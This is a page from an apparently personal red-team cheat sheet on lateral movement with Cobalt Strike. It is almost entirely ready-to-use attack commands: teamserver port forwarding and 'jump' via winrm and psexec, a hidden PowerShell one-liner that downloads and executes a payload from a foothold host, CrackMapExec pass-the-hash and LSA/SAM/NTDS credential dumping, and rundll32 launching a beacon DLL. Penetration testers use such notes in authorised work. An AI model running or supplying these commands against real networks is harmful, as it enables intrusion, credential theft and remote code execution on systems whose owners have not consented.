๐บ
๐บ
๐บ
๐บ
CheatSheets
Searchโฆ
Introduction
Getting Started With Hacking
VMs on Mac
Windows
Enumeration
Local Privilege Escalation
UAC Bypasses
Persistance
Networking
Active Directory
Offensive Powershell
Enumeration
Lateral Movement
Escalation
Persistance
Mimikatz
Alternate Cred Dumps
MSSQL
Defences and Bypasses
Setting Up a Lab
Red Teaming
Phishing Payloads
Cobalt Strike
Metasploit
Linux
Networking
Enumeration
Local Privilege Escalation
Persistance
MySQL
Mainframes
HP Nonstop
IBM z/OS
Cloud
AWS
GCP
Azure
Web App
Tomcat
SQLMap
PHP
Mobile
Android
iOS
Exploit-Dev
Linux
Shellcode
Windows
WiFi
Alfa AWUS036ACH Setup
Aircrack-ng
Powered By
GitBook
Cobalt Strike
Lateral Movement
Initial Access
Use HTTP listener and scripted web delivery
General Lateral Movment
Set up an SMB listener and use that when moving with jump command
HTTP Shells
Set up a HTTP listener
HTTP host is the first target compromised (foothold machine)
HTTP Host (Stager) same as above
HTTP Port (C2) is 443
On foothold machine port forward to teamserver
rportfwd 443 <teamserver> 443
On foothold machine jump across
jump winrm <target> <HTTP listener above>
โ
For further hops new listeners and portfwrds need to occur for any machine that cant talk to the foothold directly
Double Hop
When going over winrm and psexec you may encounter double hop issues same as usual.
1
jump psexec 127.0.0.1 SMB
2
โ
3
# After this use spawned session
Copied!
Evil Winrm
Useful for when you need to pipe through a box that you cant get a beacon on. E.g. applocker
Have HTTP listener set up as above (for this named redir) with rportfwd
Set up scripted web delivery
Local Host = Foothold
Local port = 443
Listener = redir
Type = powershell x64
SOCKS proxy through foothold
socks 9051
Use evil-winrm (
https://github.com/Hackplayers/evil-winrm
)
proxychains evil-winrm -i <ip> -u Domain\username -p 'Password'
Pass creds and launch scripted web delivery on target2
$password = "Password" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\Username",$password); invoke-command -computername TARGET2 -Credential $cred -scriptblock {powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('
http://FOOTHOLDIP:443/pivtest'))"}
โ
Keep WINRM alive for session to stay alive (or migrate to another process)
CrackMapExec
โ
https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference
โ
1
Socks Proxy through as before
2
# Test login and get hostname
3
crackmapexec smb <IP> -u <username> -p <password> [-d <domain>] [--local-auth]
4
โ
5
# Pass the hash
6
crackmapexec smb <IP> -u <username> -H <hash>
7
โ
8
# Execute Commands
9
crackmapexec -u <username> -p <password> -x whoami [--exec-method wmiexec/smbexec/atexec]
10
โ
11
# Dumps
12
crackmapexec smb <ip> -u <username> -p <password> [--lsa] [--sam] [--ntds [vss]]
Copied!
Dll
1
rundll32 C:\beacon.dll,Start
Copied!
Passing Powershell creds
1
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}
Copied!
General Tips
Make_token is only for cleartext passwords
Rubeus asktgt doesnt work so well with the /domain flag set
Red Teaming - Previous
Phishing Payloads
Next - Red Teaming
Metasploit
Last modified
1yr ago
Copy link
Contents
Lateral Movement
Initial Access
General Lateral Movment
HTTP Shells
Double Hop
Evil Winrm
CrackMapExec
Dll
Passing Powershell creds
General Tips